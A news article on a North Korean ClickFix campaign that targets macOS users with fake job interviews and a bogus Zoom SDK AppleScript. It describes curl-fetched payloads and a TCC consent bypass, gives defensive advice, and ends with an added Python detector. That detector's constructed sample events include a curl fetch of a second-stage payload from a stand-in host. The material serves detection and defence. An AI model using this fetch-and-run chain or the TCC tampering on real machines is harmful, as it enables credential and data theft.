
North Korea Uses ClickFix to Target macOS Users' Data

Source: Dark Reading (archived Apr 17, 2026)

Sapphire Sleet uses fake job offers and phony Zoom updates to deliver ClickFix attacks that steal credentials and sensitive data from Macs.



Alexander Culafi, Senior News Writer, Dark Reading
April 16, 2026, 3 min read

North Korean threat actors are using a ClickFix variant to target macOS users and steal their most valuable data.

Microsoft Threat Intelligence today published research uncovering a macOS-focused cyber campaign attributed to a North Korean threat actor tracked as Sapphire Sleet. Like many campaigns attributed to North Korea, the attacks rely on social engineering and, more specifically, ClickFix-style techniques.

ClickFix is a social engineering tactic that grew prominent over the past year. It most often works by inviting a target to an attacker-hosted website or virtual meeting (such as Zoom or Teams), where the target is then told there are technical issues that must be addressed by installing a file or running a shell command. There are no technical issues; the user is tricked into connecting to attacker infrastructure or installing a malicious binary.

Sherrod DeGrippo, general manager of Global Threat Intelligence at Microsoft, tells Dark Reading that ClickFix is so effective because users are conditioned to accept remote support interactions like clicking prompts, downloading tools, and following instructions. "Attackers exploit this familiarity to make malicious actions feel routine, lowering victim skepticism at the critical moment of compromise," she says.

While many threat actors around the world have utilized ClickFix by now, it has become a favorite of North Korean actors like Sapphire Sleet. The nation-state group is believed to overlap with threats tracked as UNC1069, APT38, and Stardust Chollima. Sapphire Sleet is focused primarily on financially supporting the North Korean government through cryptocurrency and intellectual property theft.

"In this campaign, Sapphire Sleet takes advantage of user‑initiated execution to establish persistence, harvest credentials, and exfiltrate sensitive data while operating outside traditional macOS security enforcement boundaries," Microsoft's blog post read.

How This macOS ClickFix Attack Works

For the described activity, researchers said Sapphire Sleet would create fake recruiter profiles on social media and professional networking platforms, directly engage targets under the pretense of job opportunities, and then schedule a technical interview. The "interviewer" then directs the target to install a Zoom SDK update named "Zoom SDK Update.scpt." This is a compiled AppleScript file that opens in macOS Script Editor by default. The user is then instructed to click the "Run the Script" button.

Unlike Windows-focused ClickFix attacks, which generally copy malicious shell commands to the target's clipboard and guide the target to paste them in themselves, this macOS variant relies on opening a file to execute arbitrary code.

The "SDK update" triggers a multistage payload chain, using curl commands to execute multiple AppleScript payloads. These include an attack orchestration beacon, credential harvesters, a data stealer (targeting wallets, browsers, keychains, history, Apple Notes, and Telegram), multiple backdoors for persistence, and a decoy prompt reassuring the user that the installation process has completed.

Prior to exfiltration, the payload chain also bypasses Apple's Transparency, Consent, and Control (TCC) security framework, which enforces user consent before certain actions are taken. The attacker renames a critical file associated with the TCC process, moves it to a staging location, and injects a new entry into the database access table, preventing a user prompt from being triggered. The modified database is then copied back into the original folder and restored to its original location and name.

To defend against Sapphire Sleet, Microsoft recommends that organizations educate users about social engineering attacks and how ClickFix attacks work; block or restrict the execution of .scpt files and unsigned Mach-O binaries downloaded from the Internet; exercise caution when copying and pasting sensitive data; and protect cryptocurrency wallets and browser credential stores. The blog post also includes indicators of compromise.

Microsoft reported details of the campaign to Apple, and said Apple has "since implemented updates to help detect and block infrastructure and malware associated with this campaign."
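As an added detection example (not code from the article or from Microsoft's report), the following Python scans process-execution events for the chain described above: a .scpt opened from a download location by Script Editor or osascript that then spawns curl to fetch further stages. The event format, paths, PIDs and hostnames are all constructed for this example, and the "untrusted directory" list stands in for the quarantine signal a real EDR would use.

```python
import re
from collections import defaultdict

# Constructed process-execution events (not real telemetry); one event per line.
SAMPLE_EVENTS = """\
2026-04-16T10:01:02Z pid=501 ppid=1 exe="/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor" args="/Users/dev/Downloads/Zoom SDK Update.scpt"
2026-04-16T10:01:09Z pid=502 ppid=501 exe="/usr/bin/curl" args="-fsSL https://stage.example.invalid/s2"
2026-04-16T10:01:10Z pid=503 ppid=501 exe="/usr/bin/osascript" args="/tmp/s2.scpt"
2026-04-16T11:30:00Z pid=600 ppid=1 exe="/usr/bin/curl" args="-O https://docs.example.invalid/readme.txt"
2026-04-16T12:00:00Z pid=700 ppid=1 exe="/usr/bin/osascript" args="/Users/dev/Projects/build.scpt"
"""

EVENT_RE = re.compile(r'^(\S+) pid=(\d+) ppid=(\d+) exe="([^"]*)" args="([^"]*)"$')
SCRIPT_RUNNERS = {"Script Editor", "osascript"}
# Assumed approximation of "downloaded from the Internet": where user-opened files land.
UNTRUSTED_DIRS = ("/Downloads/", "/tmp/", "/private/tmp/")


def parse_events(text):
    """Parse the constructed event format into dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ts, pid, ppid, exe, args = m.groups()
        events.append({"ts": ts, "pid": int(pid), "ppid": int(ppid),
                       "exe": exe, "name": exe.rsplit("/", 1)[-1], "args": args})
    return events


def detect_clickfix_chain(text):
    """Alert when a script runner executes a .scpt from an untrusted directory
    and that process spawns curl (the multistage fetch the article describes)."""
    events = parse_events(text)
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    alerts = []
    for e in events:
        if e["name"] not in SCRIPT_RUNNERS or not e["args"].endswith(".scpt"):
            continue
        if not any(d in e["args"] for d in UNTRUSTED_DIRS):
            continue  # a developer's own project script is not flagged
        fetches = [c["args"] for c in children[e["pid"]] if c["name"] == "curl"]
        if fetches:  # script alone is only suspicious; script + curl child is the chain
            alerts.append({"ts": e["ts"], "pid": e["pid"],
                           "script": e["args"], "curl": fetches})
    return alerts
```

Run against the sample, only the Script Editor process that opened the downloaded "Zoom SDK Update.scpt" and then spawned curl is reported; the standalone curl and the project-directory script are not.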